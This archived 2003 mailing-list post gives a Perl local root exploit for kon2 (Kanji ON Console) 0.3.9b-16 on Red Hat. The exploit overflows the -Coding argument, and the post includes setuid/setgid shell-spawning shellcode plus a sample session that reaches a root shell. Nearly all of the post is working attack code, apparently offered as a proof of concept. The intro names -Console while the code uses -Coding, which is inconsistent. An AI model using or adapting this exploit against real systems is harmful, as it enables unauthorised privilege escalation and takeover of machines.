I look kon2 source and -Console arg is the problem,
so here go the PoC.
----cut here--------
#!/usr/bin/perl
####################################################################################
#Priv8security.com kon2 version 0.3.9b-16 and < local root exploit.
#
# Tested on Redhat 8.0. should work on 9.0 and 7.3
# Bug happens on -Coding arg.
# Based on Redhat Advisory.
#
# [wsxz@localhost buffer]$ perl priv8kon.pl
# -=[ Priv8security.com kon local root exploit ]=-
# usage: priv8kon.pl offset
# [+] Using ret shellcode 0xbfffffc6
# Kanji ON Console ver.0.3.9 (2000/04/09)
#
# KON> video type 'VGA' selected
# KON> hardware scroll mode.
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=500(wsxz)
####################################################################################
$shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$path = "/usr/bin/kon";
$ret = 0xbffffffa - length($shellcode) - length($path);
$offset = $ARGV[0];
print "-=[ Priv8security.com kon2 local root exploit ]=-\n";
print "usage: $0 offset\n";
printf("[+] Using ret shellcode 0x%x\n",$ret + $offset);
$new_retword = pack('l', ($ret + $offset));
$buffer2 = "A" x 796;
$buffer2 .= $new_retword;
$buffer = $shellcode;
local($ENV{'WSXZ'}) = $buffer;
exec("$path -Coding $buffer2");
-----cut here-------
This archive was generated by hypermail 2b30 : Wed Jun 04 2003 - 08:36:52 PDT